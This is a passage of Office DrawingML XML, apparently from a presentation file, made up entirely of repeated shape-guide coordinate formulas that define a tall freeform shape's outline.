              <a:gd name="connsiteX34" fmla="*/ 480641 w 1342244"/>
              <a:gd name="connsiteY34" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 486667 w 1342244"/>
              <a:gd name="connsiteY35" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 484474 w 1342244"/>
              <a:gd name="connsiteY36" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 479954 w 1342244"/>
              <a:gd name="connsiteY37" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 475037 w 1342244"/>
              <a:gd name="connsiteY38" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 471602 w 1342244"/>
              <a:gd name="connsiteY39" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 452255 w 1342244"/>
              <a:gd name="connsiteY40" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 453884 w 1342244"/>
              <a:gd name="connsiteY41" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 441584 w 1342244"/>
              <a:gd name="connsiteY42" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 441309 w 1342244"/>
              <a:gd name="connsiteY43" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 427604 w 1342244"/>
              <a:gd name="connsiteY44" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 433387 w 1342244"/>
              <a:gd name="connsiteY45" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 455981 w 1342244"/>
              <a:gd name="connsiteY46" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 453239 w 1342244"/>
              <a:gd name="connsiteY47" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 454972 w 1342244"/>
              <a:gd name="connsiteY48" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 458715 w 1342244"/>
              <a:gd name="connsiteY49" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 466877 w 1342244"/>
              <a:gd name="connsiteY50" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 474223 w 1342244"/>
              <a:gd name="connsiteY51" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 473519 w 1342244"/>
              <a:gd name="connsiteY52" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 476962 w 1342244"/>
              <a:gd name="connsiteY53" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 484500 w 1342244"/>
              <a:gd name="connsiteY54" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 498392 w 1342244"/>
              <a:gd name="connsiteY55" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 504159 w 1342244"/>
              <a:gd name="connsiteY56" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 480918 w 1342244"/>
              <a:gd name="connsiteY57" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 456326 w 1342244"/>
              <a:gd name="connsiteY58" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 441801 w 1342244"/>
              <a:gd name="connsiteY59" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 416975 w 1342244"/>
              <a:gd name="connsiteY60" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 374255 w 1342244"/>
              <a:gd name="connsiteY61" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 308507 w 1342244"/>
              <a:gd name="connsiteY62" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 279324 w 1342244"/>
              <a:gd name="connsiteY63" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 283394 w 1342244"/>
              <a:gd name="connsiteY64" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 272284 w 1342244"/>
              <a:gd name="connsiteY65" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 274896 w 1342244"/>
              <a:gd name="connsiteY66" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 251225 w 1342244"/>
              <a:gd name="connsiteY67" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 241112 w 1342244"/>
              <a:gd name="connsiteY68" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 225329 w 1342244"/>
              <a:gd name="connsiteY69" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 222787 w 1342244"/>
              <a:gd name="connsiteY70" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 223780 w 1342244"/>
              <a:gd name="connsiteY71" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 196764 w 1342244"/>
              <a:gd name="connsiteY72" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 173321 w 1342244"/>
              <a:gd name="connsiteY73" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 127120 w 1342244"/>
              <a:gd name="connsiteY74" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 99431 w 1342244"/>
              <a:gd name="connsiteY75" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 98557 w 1342244"/>
              <a:gd name="connsiteY76" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 79352 w 1342244"/>
              <a:gd name="connsiteY77" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 85174 w 1342244"/>
              <a:gd name="connsiteY78" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 71259 w 1342244"/>
              <a:gd name="connsiteY79" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 79566 w 1342244"/>
              <a:gd name="connsiteY80" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 85439 w 1342244"/>
              <a:gd name="connsiteY81" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 77721 w 1342244"/>
              <a:gd name="connsiteY82" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 67027 w 1342244"/>
              <a:gd name="connsiteY83" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 55763 w 1342244"/>
              <a:gd name="connsiteY84" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 57219 w 1342244"/>
              <a:gd name="connsiteY85" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 52084 w 1342244"/>
              <a:gd name="connsiteY86" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 21492 w 1342244"/>
              <a:gd name="connsiteY87" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 442 w 1342244"/>
              <a:gd name="connsiteY88" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 0 w 1342244"/>
              <a:gd name="connsiteY89" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 9132 w 1342244"/>
              <a:gd name="connsiteY90" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 2788 w 1342244"/>
              <a:gd name="connsiteY91" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 84 w 1342244"/>
              <a:gd name="connsiteY92" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 3992 w 1342244"/>
              <a:gd name="connsiteY93" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 30116 w 1342244"/>
              <a:gd name="connsiteY94" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 29364 w 1342244"/>
              <a:gd name="connsiteY95" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 29194 w 1342244"/>
              <a:gd name="connsiteY96" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 34887 w 1342244"/>
              <a:gd name="connsiteY97" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 44581 w 1342244"/>
              <a:gd name="connsiteY98" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 43624 w 1342244"/>
              <a:gd name="connsiteY99" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 33909 w 1342244"/>
              <a:gd name="connsiteY100" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY101" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78938 w 1342244"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115531 w 1342244"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 127031 w 1342244"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 144438 w 1342244"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 143794 w 1342244"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 228859 w 1342244"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 244546 w 1342244"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 271474 w 1342244"/>
              <a:gd name="connsiteY10" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 263386 w 1342244"/>
              <a:gd name="connsiteY11" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 251160 w 1342244"/>
              <a:gd name="connsiteY12" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 243818 w 1342244"/>
              <a:gd name="connsiteY13" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 242616 w 1342244"/>
              <a:gd name="connsiteY14" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 255587 w 1342244"/>
              <a:gd name="connsiteY15" fmla="*/ 6061464 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 245418 w 1342244"/>
              <a:gd name="connsiteY16" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 230647 w 1342244"/>
              <a:gd name="connsiteY17" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 280159 w 1342244"/>
              <a:gd name="connsiteY18" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 309957 w 1342244"/>
              <a:gd name="connsiteY19" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 323969 w 1342244"/>
              <a:gd name="connsiteY20" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 348400 w 1342244"/>
              <a:gd name="connsiteY21" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 359524 w 1342244"/>
              <a:gd name="connsiteY22" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 375506 w 1342244"/>
              <a:gd name="connsiteY23" fmla="*/ 5344297 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 423664 w 1342244"/>
              <a:gd name="connsiteY24" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 429823 w 1342244"/>
              <a:gd name="connsiteY25" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 438105 w 1342244"/>
              <a:gd name="connsiteY26" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 441715 w 1342244"/>
              <a:gd name="connsiteY27" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 455581 w 1342244"/>
              <a:gd name="connsiteY28" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 458312 w 1342244"/>
              <a:gd name="connsiteY29" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 456570 w 1342244"/>
              <a:gd name="connsiteY30" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 463479 w 1342244"/>
              <a:gd name="connsiteY31" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 474738 w 1342244"/>
              <a:gd name="connsiteY32" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 480641 w 1342244"/>
              <a:gd name="connsiteY33" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 486667 w 1342244"/>
              <a:gd name="connsiteY34" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 484474 w 1342244"/>
              <a:gd name="connsiteY35" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 479954 w 1342244"/>
              <a:gd name="connsiteY36" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 475037 w 1342244"/>
              <a:gd name="connsiteY37" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 471602 w 1342244"/>
              <a:gd name="connsiteY38" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 452255 w 1342244"/>
              <a:gd name="connsiteY39" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 453884 w 1342244"/>
              <a:gd name="connsiteY40" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 441584 w 1342244"/>
              <a:gd name="connsiteY41" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 441309 w 1342244"/>
              <a:gd name="connsiteY42" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 427604 w 1342244"/>
              <a:gd name="connsiteY43" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 433387 w 1342244"/>
              <a:gd name="connsiteY44" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 455981 w 1342244"/>
              <a:gd name="connsiteY45" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 453239 w 1342244"/>
              <a:gd name="connsiteY46" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 454972 w 1342244"/>
              <a:gd name="connsiteY47" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 458715 w 1342244"/>
              <a:gd name="connsiteY48" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 466877 w 1342244"/>
              <a:gd name="connsiteY49" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 474223 w 1342244"/>
              <a:gd name="connsiteY50" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 473519 w 1342244"/>
              <a:gd name="connsiteY51" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 476962 w 1342244"/>
              <a:gd name="connsiteY52" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 484500 w 1342244"/>
              <a:gd name="connsiteY53" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 498392 w 1342244"/>
              <a:gd name="connsiteY54" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 504159 w 1342244"/>
              <a:gd name="connsiteY55" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 480918 w 1342244"/>
              <a:gd name="connsiteY56" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 456326 w 1342244"/>
              <a:gd name="connsiteY57" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 441801 w 1342244"/>
              <a:gd name="connsiteY58" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 416975 w 1342244"/>
              <a:gd name="connsiteY59" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 374255 w 1342244"/>
              <a:gd name="connsiteY60" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 308507 w 1342244"/>
              <a:gd name="connsiteY61" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 279324 w 1342244"/>
              <a:gd name="connsiteY62" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 283394 w 1342244"/>
              <a:gd name="connsiteY63" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 272284 w 1342244"/>
              <a:gd name="connsiteY64" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 274896 w 1342244"/>
              <a:gd name="connsiteY65" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 251225 w 1342244"/>
              <a:gd name="connsiteY66" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 241112 w 1342244"/>
              <a:gd name="connsiteY67" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 225329 w 1342244"/>
              <a:gd name="connsiteY68" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 222787 w 1342244"/>
              <a:gd name="connsiteY69" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 223780 w 1342244"/>
              <a:gd name="connsiteY70" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 196764 w 1342244"/>
              <a:gd name="connsiteY71" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 173321 w 1342244"/>
              <a:gd name="connsiteY72" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 127120 w 1342244"/>
              <a:gd name="connsiteY73" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 99431 w 1342244"/>
              <a:gd name="connsiteY74" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 98557 w 1342244"/>
              <a:gd name="connsiteY75" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 79352 w 1342244"/>
              <a:gd name="connsiteY76" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 85174 w 1342244"/>
              <a:gd name="connsiteY77" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 71259 w 1342244"/>
              <a:gd name="connsiteY78" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 79566 w 1342244"/>
              <a:gd name="connsiteY79" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 85439 w 1342244"/>
              <a:gd name="connsiteY80" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 77721 w 1342244"/>
              <a:gd name="connsiteY81" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 67027 w 1342244"/>
              <a:gd name="connsiteY82" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 55763 w 1342244"/>
              <a:gd name="connsiteY83" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 57219 w 1342244"/>
              <a:gd name="connsiteY84" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 52084 w 1342244"/>
              <a:gd name="connsiteY85" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 21492 w 1342244"/>
              <a:gd name="connsiteY86" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 442 w 1342244"/>
              <a:gd name="connsiteY87" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 0 w 1342244"/>
              <a:gd name="connsiteY88" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 9132 w 1342244"/>
              <a:gd name="connsiteY89" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 2788 w 1342244"/>
              <a:gd name="connsiteY90" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 84 w 1342244"/>
              <a:gd name="connsiteY91" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 3992 w 1342244"/>
              <a:gd name="connsiteY92" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 30116 w 1342244"/>
              <a:gd name="connsiteY93" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 29364 w 1342244"/>
              <a:gd name="connsiteY94" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 29194 w 1342244"/>
              <a:gd name="connsiteY95" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 34887 w 1342244"/>
              <a:gd name="connsiteY96" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 44581 w 1342244"/>
              <a:gd name="connsiteY97" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 43624 w 1342244"/>
              <a:gd name="connsiteY98" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 33909 w 1342244"/>
              <a:gd name="connsiteY99" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY100" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78938 w 1342244"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115531 w 1342244"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 127031 w 1342244"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 144438 w 1342244"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 156016 w 1342244"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 228859 w 1342244"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 244546 w 1342244"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 271474 w 1342244"/>
              <a:gd name="connsiteY10" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 263386 w 1342244"/>
              <a:gd name="connsiteY11" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 251160 w 1342244"/>
              <a:gd name="connsiteY12" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 243818 w 1342244"/>
              <a:gd name="connsiteY13" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 242616 w 1342244"/>
              <a:gd name="connsiteY14" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 255587 w 1342244"/>
              <a:gd name="connsiteY15" fmla="*/ 6061464 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 245418 w 1342244"/>
              <a:gd name="connsiteY16" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 230647 w 1342244"/>
              <a:gd name="connsiteY17" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 280159 w 1342244"/>
              <a:gd name="connsiteY18" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 309957 w 1342244"/>
              <a:gd name="connsiteY19" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 323969 w 1342244"/>
              <a:gd name="connsiteY20" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 348400 w 1342244"/>
              <a:gd name="connsiteY21" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 359524 w 1342244"/>
              <a:gd name="connsiteY22" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 375506 w 1342244"/>
              <a:gd name="connsiteY23" fmla="*/ 5344297 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 423664 w 1342244"/>
              <a:gd name="connsiteY24" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 429823 w 1342244"/>
              <a:gd name="connsiteY25" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 438105 w 1342244"/>
              <a:gd name="connsiteY26" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 441715 w 1342244"/>
              <a:gd name="connsiteY27" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 455581 w 1342244"/>
              <a:gd name="connsiteY28" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 458312 w 1342244"/>
              <a:gd name="connsiteY29" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 456570 w 1342244"/>
              <a:gd name="connsiteY30" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 463479 w 1342244"/>
              <a:gd name="connsiteY31" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 474738 w 1342244"/>
              <a:gd name="connsiteY32" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 480641 w 1342244"/>
              <a:gd name="connsiteY33" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 486667 w 1342244"/>
              <a:gd name="connsiteY34" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 484474 w 1342244"/>
              <a:gd name="connsiteY35" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 479954 w 1342244"/>
              <a:gd name="connsiteY36" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 475037 w 1342244"/>
              <a:gd name="connsiteY37" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 471602 w 1342244"/>
              <a:gd name="connsiteY38" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 452255 w 1342244"/>
              <a:gd name="connsiteY39" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 453884 w 1342244"/>
              <a:gd name="connsiteY40" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 441584 w 1342244"/>
              <a:gd name="connsiteY41" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 441309 w 1342244"/>
